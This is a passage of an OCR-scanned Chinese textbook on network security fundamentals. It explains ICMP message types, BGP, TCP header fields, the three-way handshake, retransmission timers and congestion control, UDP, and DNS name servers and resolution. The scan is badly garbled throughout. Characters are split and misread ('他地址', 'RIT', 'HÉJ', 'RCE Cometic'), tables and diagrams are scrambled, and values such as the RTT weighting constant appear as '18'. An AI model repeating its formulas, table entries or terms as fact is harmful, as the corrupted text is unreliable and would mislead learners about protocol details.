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类 型 代码 校 验 和 | 

参数 | 

ICMP 首部 数据 部 分 | 

: ICMP 报 文 ' 

IP 数据 报 数据 部 分 | 

3 IP 数据 报 = 


图 3-15 ICMP 报 文 格式 及 它 与 P 的 关系 


表 3-1 给 出 了 几 种 常 上 
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的 ICMP 报 文 类 型 。 


表 3-1 几 种 ICMP 报 文 及 功能 


ICMP 报 文 类 型 ICMP 报 文 的 类 型 


功 能 


终点 不 可 达 


当 路 由 器 不 能 把 数据 报 转交 给 目的 站 时 , 就 向 源 
站 发 送 终点 不 可 达 报 文 


源 站 抑制 


当 路 由 器 由 于 拥塞 而 丢弃 数据 报时 , 就 向 源 站 发 
送 源 站 抑制 报 文 , 使 源 站 放 慢 数据 报 的 发 送 速度 


改变 路 由 


当 路 由 器 发 现 主机 可 以 把 数据 报 发 送 给 另外 一 
个 路 由 器 , 使 数据 报 沿 着 更 短 更 好 的 路 由 被 转发 


时 间 超 时 


询问 报 文 


13 或 14 | 时 间 戳 请求 或 回答 


5. BGP 的 结构 和 功能 


当 路 由 器 收 到 一 个 IP 数据 报时 ， 发 现 它 的 生存 
时 间 为 零 , 或 主机 在 预订 的 时 间 内 无 法 完成 数据 
报 的 重 装 ， 则 向 源 站 发 送 时 间 超 时 报 文 

当 路 由 器 或 目的 站 发 现 收 到 的 数据 报 首部 字段 
中 有 不 正确 的 字段 时 , 就 向 源 站 点 发 送 参数 问题 
报 文 

当 需 要 测试 某 一 目的 站 点 是 否 可 达 时 ,就 发 送 一 
个 ICMP 回 送 请 求 报 文 , 然后 目的 站 点 会 向 发 送 
站 回 送 一 个 ICMP 回答 报 文 

当 需 每 个 路 由 器 或 主机 给 出 当前 的 日 期 和 时 间 
时 ， 就 发 送 时 间 惟 请 求 报 文 ， 然 后 被 请 求 方 会 回 
送 一 个 时 间 戳 回答 报 文 , 告知 自己 当前 的 日 期 和 
时 间 。 这 样 可 以 用 来 测试 通信 延迟 


BGP 用 于 在 不 同 的 自治 系统 CAS) 之 间 交 换 路 由 信息 。 当 两 个 AS 需要 交换 路 由 信 
息 时 ， 每 个 AS 都 必须 指定 一 个 运行 BGP 的 节点 ， 来 代表 AS 与 其 他 的 AS 交换 路 由 信 
息 。 这 个 节点 可 以 是 一 个 主机 。 通常 是 路 由 器 来 执行 BGP。 两 个 AS 中 利用 BGP 交换 信 
息 的 路 由 器 也 被 称 为 边界 网 关 (Border Gateway) 或 边界 路 由 器 (Border Router). 

由 于 可 能 与 不 同 的 AS 相连 ,在 一 个 AS 内 部 可 能 存在 多 个 运行 BGP 的 边界 路 由 器 。 
同一 个 自治 系统 (AS) 中 的 两 个 或 多 个 对 等 实体 之 间 运 行 的 BGP 被 称 为 IBGP (Internal/ 
Interior BGP)。 归 属 不 同 的 AS 的 对 等 实体 之 间 运 行 的 BGP 称 为 EBGP (Extemal/Exterior 


BGP). YE AS 边界 上 与 其 他 AS 交换 信息 的 路 
在 互联 网 


由 器 被 称 作 边界 路 由 器 (border/edge router). 


操作 系统 〈Cisco IOS) H, IBGP 通告 的 路 由 的 距离 为 200， 优 先 级 比 EBGP 


和 任何 内 部 网 关 协 议 CGP) 通告 的 路 由 都 低 。 其 他 的 路 由 器 实现 中 ， 优 先 级 顺序 也 是 


wE 


EBGP 高 于 IGP， 而 IGP 又 高 于 卫 GP。 


BGP 属于 外 部 网 关 路 由 协议 , 可 以 实现 自治 系统 间 无 环 路 的 域 间 路 由 。BGP 是 沟通 


Intemet 广域网 的 主要 路 由 协议 ， 例 如 不 同 省 


份 、 不 同 国家 之 间 的 路 由 大 多 要 依靠 BGP 


协议 。 BGP 可 分 为 人 BGP (Internal BGP) 和 EBGP (External BGP). BGP 的 邻居 关系 (或 


ie 


isa 


信息 安全 工程 师 教程 


称 通信 对 端 /对 等 实体 ) 是 通过 人 工 配 置 实现 的 ， 对 等 实体 之 间 通 过 TCP (端口 179) 会 话 
交互 数据 。 BGP 路 由 器 会 周期 地 发 送 19 字 节 的 保持 存活 keep-alive 消息 来 维护 连接 CK 
认 周 期 为 30s)。 在 路 由 协议 中 ， 只 有 BGP 使 用 TCP 作为 传输 层 协 议 。 

IETF 先后 为 BGP 制定 了 多 个 建议 ， 分 别 为 : 

。 RFC 4271: 当前 正 使 用 的 BGP 协议 版 本 ， 称 之 为 BGP4。 

。 RFC 1654: BGP4 协议 的 第 一 个 规范 。 

e RFC 1105, RFC 1163, RFC 1267、RFC1771: BGP4 之 前 的 BGP 版 本 。 

BGP 属于 外 部 或 域 间 路 由 协议 。BGP 的 主要 目标 是 为 处 于 不 同 AS 中 的 路 由 器 之 间 
进行 路 由 信息 通信 提供 保障 。BGP 既 不 是 纯粹 的 矢量 距离 协议 ， 也 不 是 纯粹 的 链 路 状态 
协议 , 通常 被 称 为 通路 向 量 路 由 协议 。 这 是 因为 BGP 在 发 布 到 一 个 目的 网 络 的 可 达 性 的 
同时 ,包含 了 在 下 分 组 到 达 目 的 网 络 过 程 中 所 必须 经 过 的 AS 的 列表 。 通 路 向 量 信息 是 
十 分 有 用 的 , 因为 只 要 简单 地 查找 一 下 BGP 路 由 更 新 的 AS 编号 就 能 有 效 地 避免 环 路 的 
出 现 。BGP 对 网 络 拓扑 结构 没有 限制 ， 其 特点 包括 : 

d) 实现 自治 系统 间 通 信 ， 传 播 网 络 的 可 达 信 息 。BGP 是 一 个 外 部 网 关 协 议 ， 允 许 
一 个 AS 与 另 一 个 AS 进行 通信 。BGP 允许 一 个 AS 向 其 他 AS 通告 其 内 部 的 网 络 的 可 达 
性 信息 ， 或 者 是 通过 该 AS 可 达 的 其 他 网 络 的 路 由 信息 。 同 时 ，AS 也 能 够 从 另 一 个 AS 
中 了 解 这 些 信息 。 与 距离 向 量 选 路 协议 类 似 ，BGP 为 每 个 目的 网 络 提供 的 是 下 一 跳 
(next-hop) 结 点 的 信息 。 

(2) 多 个 BGP 路 由 器 之 间 的 协调 。 如 果 在 一 个 自治 系统 内 部 有 多 个 路 由 器 分 别 使 用 
BGP 与 其 他 自治 系统 中 对 等 路 由 器 进行 通信 ,BGP 可 以 协调 者 这 多 个 路 由 器 , 使 这 些 路 
由 器 保持 路 由 信息 的 一 致 性 。 

(3) BGP 支持 基于 策略 的 选 路 (policy-base routing). 一 般 的 距离 向 量 选 路 协议 确切 
通告 本 地 选 路 中 的 路 由 。 而 BGP 则 可 以 实现 由 本 地 管理 员 选 择 的 策略 。BGP 路 由 器 可 
以 为 域内 和 域 间 的 网 络 可 达 性 配置 不 同 的 策略 。 

(4) 可 靠 的 传输 。BGP 路 由 信息 的 传输 采用 了 可 靠 的 TCP 协议 。 

(5) 路 径 信息 。 在 BGP 通告 目的 网 络 的 可 达 性 信息 时 , 除了 指定 目的 网 络 的 下 一 跳 
信息 之 外 ,通告 中 还 包括 了 通路 向 量 (path vector)， 即 去 往 该 目的 网 络 时 需要 经 过 的 AS 
的 列表 ， 使 接收 者 能 够 了 解 去 往 目的 网 络 的 通路 信息 。 

(6) 增 量 更 新 。BGP 不 需要 在 所 有 路 由 更 新 报 文 中 传送 完整 的 路 由 数据 库 信 息 ， 只 
需要 在 启动 时 交换 一 次 完整 信息 。 后 续 的 路 由 更 新 报 文 只 通告 网 络 的 变化 信息 。 这 种 网 
络 变 化 的 信息 称 为 增 量 (delta)。 

(7) BGP 支持 无 类 型 编制 (CIDR) 及 VLSM 方式 。 通 告 的 所 有 网 络 都 以 网 络 前 级 
加 子 网 掩 码 的 方式 表示 。 

(8) 路 由 聚集 。BGP 允许 发 送 方 把 路 由 信息 聚集 在 一 起 ， 用 一 个 条 目 来 表示 多 个 相 
关 的 目的 网 络 ， 以 节约 网 络 带 宽 。 
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(9) BGP 还 允许 接收 方 对 报 文 进行 鉴别 和 认证 ， 以 验证 发 送 方 的 身份 。 
3.1.2.2 ”传输 层 协议 TCP 与 UDP 

TCP 和 UDP 是 mtemet 传输 层 的 两 个 协议 。 从 图 3-3 可 以 看 出 它们 分 别 为 应 用 层 的 
不 同 协议 提供 服务 。 当然 什么 样 的 应 用 层 协议 使 用 TCP, 什么 样 的 应 用 层 协议 使 用 UDP， 
是 根据 它们 的 需要 及 TCP 和 UDP 的 特点 而 决定 的 。 

1. TCP 协议 特点 

TCP 是 面向 连接 的 协议 ， 提 供 可 靠 的、 全 双 工 的 、 面 向 字 节 流 的 ， 端 到 端的 服务 。 

TCP 的 连接 是 一 对 端点 的 连接 ， 为 了 清晰 地 表明 这 条 连接 的 源 地 址 和 目的 地 址 ， 给 
每 一 个 端点 分 配 一 个 套 接 字 (socket) 或 插口 。 每 台 主 机 对 端口 号 是 独立 编号 ， 端 口号 
和 了 IP 地址 绑 定 后 形成 插口 。 因 为 P 地 址 是 唯一 的 ， 所 以 插口 也 是 唯一 的 。 

套 接 字 = CP 地 址 : 端口 号 ) 

端口 号 对 应 主机 中 的 一 个 应 用 进程 ， 编 程 语 言 通常 用 port 表示 。 由 此 可 得 

TCP 连接 : =(Socketl, Socket2)=((IP1:portl), (IP2:port2)) 


2. TCP 报 文 格式 
TCP 报 文 的 格式 及 其 与 人 数据 报 的 关系 如 图 3-16 所 示 。 
位 0 16 31 
HCI 目的 端口 号 
序号 
确认 号 
数据 偏 移 | 保留 | | an 
校 验 和 紧急 指针 
选项 (长 度 可 变 ) 填充 
TCP 首部 数据 部 分 
i TCP 报 文 ~ 
IP 首部 数据 部 分 
=- IP 数据 报 - 


图 3-16 TCP 报 文 的 格式 及 它 与 下 数据 报 的 关系 
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。 序号 : 4byte。TCP 传送 的 数据 流 每 一 个 字 节 都 编 有 一 个 序号 。 序 号 字段 中 的 值 是 
本 报 文 段 所 发 送 数据 的 第 一 个 字 节 的 序号 。 

。 确认 号 : 4byte。 确认 字段 的 值 是 期 望 收 到 对 方 下 一 个 报 文 段 的 数据 的 第 一 个 字 节 
的 序号 。 

。 数据 偏 移 : 4bit， 它 指出 当前 TCP 报 文 段 的 数据 起 始 处 距离 TCP 报 文 段 的 起 始 处 
有 多 远 。“ 数 据 偏 移 ”的 单位 不 是 字 节 而 是 32bit 字 〈4 字 节 为 计算 单位 )。 

。 紧急 比特 URG: “4 URG =1 时 ， 表 明 紧 急 指 针 字 段 有 效 。 

。 确认 比特 ACK: 只 有 当 ACK =1 时 确认 号 字段 才 有 效 。 

。 推送 比特 PSH: 接收 TCP 收 到 推送 比特 置 1 的 报 文 段 ， 就 尽快 地 交付 给 接收 应 
用 进程 ， 而 不 再 等 到 整个 缓存 都 填 满 了 后 再 向 上 交付 。 

。 复位 比特 RST: 当 RST=1 IN, 表明 TCP 连接 中 出 现 严 重 差 错 〈 如 由 于 主机 崩溃 
或 其 他 原因 )， 必 须 释 放 连 接 ， 然 后 再 重新 建立 运输 连接 。 

。 同步 比特 SYN: 同步 比特 SYN 置 为 1， 就 表示 这 是 一 个 连接 请 求 或 连接 接受 报 文 。 

。 终止 比特 FIN: 用 来 释放 一 个 连接 。 当 FIN=1 时 ， 表 明 此 报 文 段 的 发 送 端的 数据 
已 发 送 完毕 ， 并 要 求 释放 运输 连接 。 

。 窗口 : 2 字 节 。 窗 口 字 段 用 来 控制 对 方 发 送 的 数据 量 。TCP 连接 的 一 端 根据 设置 
的 缓存 空间 大 小 确定 自己 的 接收 窗口 大 小 ,然后 通知 对 方 以 确定 对 方 的 发 送 窗口 
的 上 限 。 

3. TCP 建立 与 释放 连接 机 制 

TCP 提供 的 可 靠 服务 ， 在 连接 的 建立 和 释放 上 也 体现 了 出 来 。 

(1) TCP 连接 建立 机 制 

TCP 使 用 三 次 握手 来 建立 连接 ， 大 大 增强 了 可 靠 性 。 如 防止 已 失效 的 连接 请 求 报 文 


段 到 达 被 请 求 方 ， 产 生 错误 造成 资源 的 浪费 。 有 具体 过 程 如 图 3-17 所 示 。 


SYN=1, 序号 =X 
连接 请 求 = 
SYN=1. ACK=1. 序号 =Y， 确认 序号 =X+1 
一 确认 
ACK=1, 序号 =X+1， 确认 序号 =Y+1 
确认 


图 3-17 TCP 三 次 握手 连接 建立 过 程 
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(2) TCP 连接 释放 机 制 

TCP 的 释放 分 为 : 半 关 闭 和 全 关闭 两 个 阶段 。 半 关闭 阶段 是 当 A 没有 数据 再 向 B 
发 送 时 ，A 向 B 发 出 释放 连接 请 求 ，B 收 到 后 向 A 发 回 确认 。 这 时 A 向 B 的 TCP 连接 
就 关闭 了 。 但 B 仍 可 以 继续 向 A 发 送 数据 。 当 B 也 没有 数据 再 向 A 发 送 时 ， 这 时 B 就 
向 A 发 出 释放 连接 的 请 求 ， 同 样 ，A 收 到 后 向 B 发 回 确认 。 至 此 为 止 B 向 A 的 TCP 连 
接 也 关闭 了 。 当 B 确实 收 到 来 自 A 的 确认 后 ,就 进入 了 全 关闭 状态 。 具体 过 程 如 图 3-18 
所 示 。 

A 主机 B 主机 


释放 连接 请 求 一 
ACK=1, 序号 =Y， 确 认 序号 =X+1 


一 确认 


FIN=1，ACK=1 序号 =Y， 确 认 序号 =X+1 
= 释放 连接 请 求 


、 ACK=1， 序号 =X+1， 确认 序号 =Y+1 
确认 


图 3-18 TCP 释放 连接 的 过 程 


4. TCP 定时 管理 机 制 

重 传 机 制 是 保证 TCP 可 靠 性 的 重要 措施 。TCP 每 发 送 一 个 报 文 段 , 就 对 这 个 报 文 段 
设置 一 次 计时 器 。 只 要 计时 器 设置 的 重 传 时 间 到 但 还 没有 收 到 确认 ， 就 要 重 传 这 一 报 文 
段 。 超 时 重 传 时 间 设 置 的 长 短 、 恰 当 与 否 关系 到 网 络 的 工作 效率 。 如 果 设 置 的 太 短 ， 会 
引起 很 多 报 文 段 的 重 传 , 增 大 网 络 的 负荷 : 如 果 设 置 的 太 长 ， 则 会 增 大 网 络 的 空闲 时 间 ， 
降低 网 络 的 传输 效率 。 

TCP 采用 如 下 方法 计算 超时 重 传 时 间 。 

所 涉及 的 参数 : 报 文 段 的 往返 时 间 RIT， 报 文 段 的 加 权 平 均 往 返 时 延 RTTs， 超 时 
重 传 时 间 RTO, RIT 的 偏差 的 加 权 平 均值 RTTp。 


有 具体 步骤 如 下 : 
首先 计算 出 来 第 一 个 RIT。 然 后 把 第 一 个 RIT 值 设置 为 RTT 的 初始 值 。 以 后 再 计 
算 新 的 RTTs 时 采用 如 下 公式 : 
新 的 RTTs 二 (1-a) X ( 旧 的 RTTs) +aX (新 的 RIT FEA) (3-1) 


其 中 a 的 值 常 取 为 18。 计 算 RTO 的 公式 为 : 


Bis 项 


Wiss Bi 
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RTO=RTTs+4xRTTD (3-2) 
RITp 的 初始 值 为 RTT 样本 值 的 一 半 ， 以 后 再 计算 RTTD 时 采用 公式 : 
新 的 RTTp 二 (1-B) x (HÉJ RTTo) +Bx| RTTs- 新 的 RTT 样本 | (3-3) 


IEF B 的 值 常 取 为 1/4。 

需要 注意 的 是 往返 时 间 RTT 的 测量 是 比较 复杂 的 。 

5. TCP 拥塞 控制 策略 

传输 层 的 主要 任务 是 保证 端 到 端 可 靠 的 传输 。 端 到 端 之 间 跨越 的 是 若干 个 网 络 (局 
域 网 和 广域网 )。 所 以 要 保证 网 络 高 的 传输 效率 ,必须 保证 网 络 的 畅通 ,不 会 发 生 拥塞 现 
象 。 因 为 一 旦 网 络 发 生 拥 塞 ， 不 但 网 络 的 传输 速度 会 降低 ， 而 且 还 会 导致 数据 的 丢失 和 
重 传 。 那 么 网 络 在 什么 情况 下 会 发 生 拥塞 呢 ? 可 以 把 网 络 发 生 拥塞 的 条 件 用 如 下 公式 
表示 : 


了 对 资源 的 需求 > 可 用 资源 (3-4) 

其 中 资源 是 指 链 路 的 容量 、 交 换 结 点 的 缓存 大 小 和 处 理 机 速度 。 

所 谓 拥塞 控制 就 是 防止 过 多 的 数据 注入 网 络 , 使 网 络 中 的 链 路 和 交换 结 点 (路 由 器 ) 
的 负荷 不 致 过 载 而 发 生 拥塞 。 

发 送 端的 主机 在 确定 发 送 报 文 段 的 速率 时 ， 既 要 根据 接收 端的 接收 能 力 ， 又 要 从 全 
局 考虑 不 要 使 网 络 发 生 拥 塞 。 因 此 , 每 一 个 TCP 连接 需要 有 接收 端 窗口 和 拥塞 窗口 两 个 
状态 变量 , 发 送 端的 窗口 取 两 者 中 较 小 的 值 。 接 收 窗口 就 是 TCP 报 文 段 首部 中 的 窗口 字 
段 的 值 ， 是 接收 端 主机 根据 其 目前 的 接收 缓存 大 小 所 许诺 的 最 新 的 窗口 值 。 拥 塞 窗口 是 
网 络 的 传输 能 力 ， 是 由 发 送 端 设 置 的 。 

TCP 的 拥塞 控制 主要 有 以 下 四 种 方法 : 慢 开始 、 拥 塞 避免 、 快 重 传 和 快 恢复 。 

(1) 慢 开始 和 拥塞 避免 

因为 当主 机 开始 发 送 数据 时 ， 如 果 立 即将 较 大 的 发 送 窗口 中 的 全 部 数据 字 节 都 注入 
到 网 络 ， 由 于 还 不 清楚 网 络 的 状况 ， 有 可 能 引起 网 络 拥塞 。 经 验证 明 ， 较 好 的 方法 是 试 
探 一 下 ， 即 由 小 到 大 逐渐 增 大 发 送 端的 拥塞 窗口 数值 ， 就 是 所 谓 的 慢 开 始 算法 。 

慢 开 始 的 工作 过 程 : 通常 在 刚刚 开始 发 送 报 文 段 时 可 先 将 拥塞 窗口 cwnd 设置 为 一 
个 最 大 报 文 段 MSS (Maximum Segment Size) 的 数值 。 而 在 每 收 到 一 个 对 新 的 报 文 段 的 
确认 后 ， 将 拥塞 窗口 增加 至 多 一 个 MSS 的 数值 ， 如 图 3-19 所 示 。 用 这 样 的 方法 逐步 增 
大 发 送 端的 拥塞 窗口 cwnd， 可 以 使 分 组 注入 到 网 络 的 速率 更 加 合理 。 

当然 ， 在 这 种 机 制 下 ， 拥 塞 窗口 也 不 会 一 直 成 指数 增长 ， 通 常会 设置 一 个 慢 开始 
门限 值 ssthresh， 当 拥塞 窗口 达到 此 值 时 ， 就 变 为 线性 增长 ， 执 行 拥塞 避免 算法 。 在 整 
个 过 程 中 一 旦 出 现 数据 传输 超时 ， 就 会 把 拥塞 窗口 重新 回 到 1， 并 再 次 开始 慢 开 始 
算法 。 
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报 文 段 1 
确认 1 
报 文 段 2 
报 文 段 3 
确认 2 
确认 3 
报 文 段 4 
报 文 段 5 
报 文 段 6 
文 段 a 


图 3-19 慢 开 始 算法 


RCE Cometic 


(2) 快 重 传 和 快 恢复 

快 重 传 和 快 恢复 是 TCP 拥塞 控制 机 制 中 为 了 进一步 提高 网 络 性 能 而 设置 的 两 个 
算法 。 

快 重 传 算法 规定 ， 发 送 端 只 要 一 连 收 到 三 个 重复 的 ACK 即 可 断定 有 分 组 丢失 了 ， 
就 应 立即 重 传 丢失 的 报 文 段 而 不 必 继 续 等 待 为 该 报 文 段 设置 的 重 传 计时 器 的 超时 ， 具 体 
过 程 如 图 3-20 所 示 。 不 难看 出 ， 快 重 传 并 非 取 消 重 传 计 时 器 ， 而 是 在 某 些 情况 下 可 更 早 
地 重 传 丢失 的 报 文 段 ， 从 而 提高 吞吐 率 。 


发 送 端 接收 端 

MI 报 文 段 

M2 报 文 段 ACK M1 报 文 段 
M3 报 文 段 ACK M2 报 文 段 
M4 报 文 段 ACK M3 报 文 段 
M5 报 文 段 

M6 RB ACK M3 报 文 段 
M7 报 文 段 ACK M3 报 文 段 
Ms 报 文 自 ACK M3 报 文 段 
M4 报 文 段 


图 3-20 快 重 传 算法 


快 恢复 算法 是 和 快 重 传 算法 相配 合 的 算法 。 在 采用 快 恢复 算法 时 ， 慢 开始 算法 只 是 
在 TCP 连接 建立 时 和 网 络 出 现 超时 时 才 使 用 。 其 工作 要 点 为 : 当 发 送 方 连续 收 到 三 个 重 
复 的 报 文 段 确认 时 ， 就 把 慢 开始 门限 值 缩小 一 半 ， 并 执行 拥塞 避免 算法 一 一 线性 增加 拥 
ZAO. 

(3) 随机 早期 检测 RED (Random Early Detection) 

TCP 拥塞 管理 的 另 一 种 方法 是 预防 性 分 组 丢弃 。 使 用 这 种 方法 ， 路 由 器 在 输出 缓存 
完全 装 满 之 前 ， 即 网 络 发 生 拥 塞 之 前 ， 准 确 地 说 是 检测 到 网 络 拥塞 的 早期 征兆 时 《〈 路 
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器 的 平均 队列 长 度 超过 一 定 的 门限 值 )， 就 丢弃 一 个 或 多 个 分 组 ， 以 便 改进 网 络 的 性 能 。 
预防 性 分 组 丢弃 的 最 重要 的 例子 是 随机 早期 检测 。 


6. UDP 协议 
(1) UDP 的 特点 


UDP 只 在 IP 的 数据 报 服务 之 上 增加 了 很 少 的 一 点 功能 ， 即 端口 的 功能 和 差错 检测 的 
功能 。 虽然 UDP 用 户 数 据 报 只 能 提供 不 可 靠 的 交付 ， 但 UDP 在 某 些 方面 有 其 特殊 的 优点 : 

。 发 送 数据 之 前 不 需要 建立 连接 ; 

。 UDP 的 主机 不 需要 维持 复杂 的 连接 状态 表 ; 

© UDP 用 户 数据 报 只 有 8 个 字 节 的 首部 开销 ; 

。 网 络 出 现 的 拥塞 不 会 使 源 主机 的 发 送 速率 降低 ， 这 对 某 些 实时 应 用 是 很 重要 的 ， 


如 表 3-2 所 示 。 
表 3-2 TCP 协议 和 UDP 协议 的 应 用 
应 用 运输 层 协议 

名 字 转 换 DNS UDP 
文件 传送 UDP 
路 由 选择 协议 [ep | UDP 
大 地 址 本 和 UDP 
网 络 管理 UDP 
远程 文件 服务 器 UDP 
四 电话 UDP 
流 式 多 媒体 通信 UDP 
多 播 IGMP UDP 
电子 邮件 SMTP TCP 
远程 终端 接 入 TELNET TCP 
万 维 网 HTTP TCP 
文件 传送 FTP TCP 


(2) UDP 用 户 数据 报 的 首部 格式 〈 见 图 3-21) 
3.1.2.3 ”应 用 层 协 议 

每 个 应 用 层 协 议 都 是 为 了 解决 某 一 类 应 用 问题 ， 而 问题 的 解决 又 往往 是 通过 位 于 不 
同 主机 中 的 多 个 应 用 进程 之 间 的 通信 和 协同 工作 来 完成 的 。 应 用 层 的 具体 内 容 就 是 规定 
应 用 进程 在 通信 时 所 遵循 的 协议 。 


io B 
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字 节 4 4 1 i 2 


JIP Ho | BHY IP Heh 0 17 | UDP 长 度 | 


| UDP 首部 | 数据 部 分 | 


us UDP 数据 报 + 


| IP 首 部 | 数据 部 分 | 


- 中 数据 报 - 


图 3-21 UDP 协议 及 它 与 于 数据 报 的 关系 


1. 域名 系统 DNS (Domain Name System) 

域名 系统 DNS 的 功能 是 把 Internet 中 的 主机 域名 解析 为 对 应 的 IP 地 址 。 域 名 系统 
DNS 是 一 个 联机 分 布 式 数据 库 系统 。 工 作 方式 采用 客户 服务 器 方式 。 域 名 服务 器 是 运行 
域名 服务 器 程序 的 机 器 。 

(1) DNS 名 字 空 间 
目前 ， 因 特 网 的 命名 方法 是 层次 树 状 结构 的 方法 。 采 用 这 种 命名 方法 ， 任 何 一 个 连 
接 在 因特网 上 的 主机 或 路 由 器 , 都 有 一 个 唯一 的 层次 结构 的 名 字 , 即 域名 (domain name)。 
域 是 名 字 空 间 中 一 个 可 被 管理 的 划分 。 域 可 以 继续 划分 为 子 域 ， 如 二 级 域 、 三 级 域 等 等 。 
域名 的 结构 由 若干 个 分 量 组 成 ， 各 分 量 之 间 用 点 《请 注意 ， 是 小 数 点 的 点 ) 隔 开 : 

...。 三 级 域名 .二 级 域名 .顶级 域名 

各 分 量 分 别 代 表 不 同 级 别 的 域名 。 

每 一 级 的 域名 都 由 英文 字母 和 数字 组 成 (不 超过 63 个 字符 ， 并 且 不 区 分 大 小 写字 
母 )， 完 整 的 域名 不 超过 255 个 字符 。 

目前 顶级 域名 TLD(Top Level Domain) 有 国家 项 级 域名 , 国际 项 级 域名 , 通用 顶级 域 
名 三 大 类 。 最 早 的 顶级 域名 是 : .com 表示 公司 企业 、.net 表示 网 络 服务 机 构 、.org 表 
示 非 赢利 性 组 织 、.edu 表示 教育 机 构 (美国 专用 )、.gov 表示 政府 部 门 (美国 专用 )、.mil 
表示 军事 部 门 (美国 专用 )。 

图 3-22 是 因特网 名 字 空 间 的 结构 图 。 
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根 


顶级 域 T T TT T 
ses. biz 


Iq 
aero com net org edu gov mil int cn uk 


三 级 域 mail ... whu tsinghua pku seu 


四 级 域 


mail csnetl ep ... 
图 3-22 ”因特网 的 名 字 空 间 


要 强调 指出 的 是 ， 因 特 网 的 名 字 空 间 是 按照 机 构 的 组 织 来 划分 的 ， 与 物理 的 网 络 无 
与 卫 地 址 中 的 “ 子 网 ”也 没有 关系 。 
(2) 资源 记录 
DNS 资源 记录 语法 : 
{name} {TTL} addr-class record-type record-specific-data， 其 中 : 
O name: 域 记录 的 名 字 。 通 常 只 有 第 一 个 DNS 资源 记录 配置 name 栏 ， 对 于 区 域 
文档 中 其 他 的 资源 记录 ,name 也 可 能 是 空白 , 这 种 情况 下 ， 其 他 的 资源 记录 接受 先前 的 
资源 记录 的 名 字 。 

®© TTL: Live 栏 可 选择 的 时 间 。 指 定 该 数据 在 数据 库 中 保管 多 长 时 间 ， 此 栏 为 空 表 
示 默 认 的 生存 周期 在 授权 资源 记录 开始 中 指定 。 

@ addr-class: 地 址 类 。 大 范围 用 于 Internet 地 址 和 其 他 信息 的 地 址 类 为 IN. 

@ record-type: 记录 类 型 。 常 为 A NS MX CNAME. 

® record-specific-data: 记录 类 型 的 数据 。 

record-type 的 定义 如 表 3-3 所 示 。 


表 3-3 record-type 的 定义 


类 型 =z x 值 

SOA Start OF Authority 该 区 的 参数 

A 主 的 于 地 址 32 位 整数 

MX 邮件 交换 优先 权 ， 域 
NS 名 字 服 务 器 本 域 服务 器 名 
PTR 指针 人 P 地 址 的 别名 
HINFO 主机 描述 CPU, OS 信息 
TXT 文本 ASCII #3 


EA 


A 
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注意 : MX 是 准备 为 自己 接收 电子 邮件 的 域名 

(3) 域名 服务 器 

可 以 把 域名 服务 器 分 为 根 域名 服务 器 、 顶 级 域名 服务 器 、 权 限 域名 服务 器 和 本 地 域 
名 服务 器 四 种 不 同类 型 。 

© 根 域名 服务 器 (root name server): 根 域名 服务 器 是 最 高 层次 的 域名 服务 器 。 每 一 
个 根 域名 服务 器 都 要 存 有 所 有 项 级 域名 服务 器 的 瑟 地 址 和 域名 。 当 一 个 本 地 域名 服务 器 
对 一 个 域名 无 法 解析 时 ， 就 会 直接 找到 根 域 名 服务 器 ， 然 后 根 域 名 服务 器 会 告知 它 应 该 
去 找 哪 一 个 顶级 域名 服务 器 进行 查询 。 目 前 全 世界 共 13 个 根 域名 服务 器 , 它们 的 名 字 是 
用 一 个 英文 字母 命名 ,从 a 一 直到 m (前 13 个 字母 )。1 个 为 主根 服务 器 ,放置 在 美国 。 
ER 12 个 均 为 辅 根 服务 器 ， 其 中 9 个 放置 在 美国 ， 欧 洲 2 个 ， 位 于 英国 和 瑞典 ， 亚 洲 1 
个 ， 位 于 日 本 。 

@ 顶级 域名 服务 器 (TLD server): 顶级 域名 服务 器 负责 管理 在 本 顶级 域名 服务 器 
上 注册 的 所 有 二 级 域名 。 当 收 到 DNS 查询 请 求 时 ， 能 够 将 其 管辖 的 二 级 域名 转换 为 该 
二 级 域名 的 他 地址。 或 者 是 下 一 步 应 该 找寻 的 域名 服务 器 的 他 地 址 。 

@ 权限 域名 服务 器 (authoritative name server): DNS 采用 分 区 的 办 法 来 设置 域名 服 
务 器 。 一 个 服务 器 所 管辖 的 范围 称 为 区 。 区 的 范围 小 于 或 等 于 域 的 大 小 。 各 个 单位 可 以 
根据 自己 单位 的 情况 来 划分 区 的 范围 。 每 一 个 区 都 设置 有 服务 器 ， 这 个 服务 器 叫 权 限 服 
务 器 ,， 它 负责 将 其 管辖 区 内 的 主机 域名 转换 为 该 主机 的 下 地址 。 在 其 上 保存 有 所 管辖 区 
内 的 所 有 主机 域名 到 IP 地 址 的 映射 。 

@ 本 地 域名 服务 器 (local name serveD: 也 称 为 默认 域名 服务 器 。 当 一 个 主机 发 出 
DNS 查询 报 文 时 ， 这 个 查询 报 文 就 首先 被 送 往 该 主机 的 本 地 域名 服务 器 。 当 选择 PC 机 
中 “Intemet 协议 (TCP/IP)” 的 “属性 ”， 就 可 看 到 DNS 地 址 的 选项 。 其 中 的 DNS 服务 
器 就 是 本 地 域名 服务 器 。 本 地 域名 服务 器 离 用 户 较 近 ， 一 般 不 超过 几 个 路 由 器 的 距离 。 
当 所 要 查询 的 主机 也 属于 同一 个 本 地 ISP 时 ， 该 本 地 域名 服务 器 立即 就 能 将 所 查询 的 主 
机 名 转换 为 它 的 下 地址 ， 而 不 需要 青 去 询问 其 他 的 域名 服务 器 。 

(4) 域名 解析 

域名 解析 过 程 的 要 点 : 当 某 个 应 用 进程 需要 把 某 个 主机 的 域名 解析 为 对 应 的 他 地 址 
时 ， 它 将 调用 解析 程序 ， 成 为 DNS 的 客户 方 ， 并 把 要 解析 的 主机 域名 放 在 DNS 请 求 报 
文中 ， 然 后 使 用 UDP 用 户 数据 报 将 其 发 往 本 地 域名 服务 器 。 本 地 域名 服务 器 对 其 进行 
对 应 查询 ， 如 果 查 找 成 功 ， 就 将 结果 放 入 DNS 回答 报 文中 ， 同 样 使 用 UDP 用 户 数据 报 
将 返回 给 请 求 方 。 

在 域名 的 解析 过 程 中 ， 本 地 域名 服务 器 可 以 采用 递归 查询 和 迭代 查询 两 种 查询 
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方式 。 
递归 查询 的 思想 : 当 某 个 主机 有 域名 解析 请 求 时 ， 它 总 是 首先 向 本 地 域名 服务 器 发 


出 查询 请 求 ， 如 果 本 地 域名 服务 器 知道 查询 结果 ， 那 么 它 将 把 结果 返回 给 请 求 者 ， 如 果 
本 地 域名 服务 器 不 知道 查询 结果 ， 它 将 作为 DNS 客户 方向 根 域名 服务 器 发 出 查询 请 求 。 
然后 由 根 域名 服务 器 去 完成 接 下 来 的 查询 。 图 3-23 给 出 了 一 个 递归 查询 的 例子 。 在 这 个 
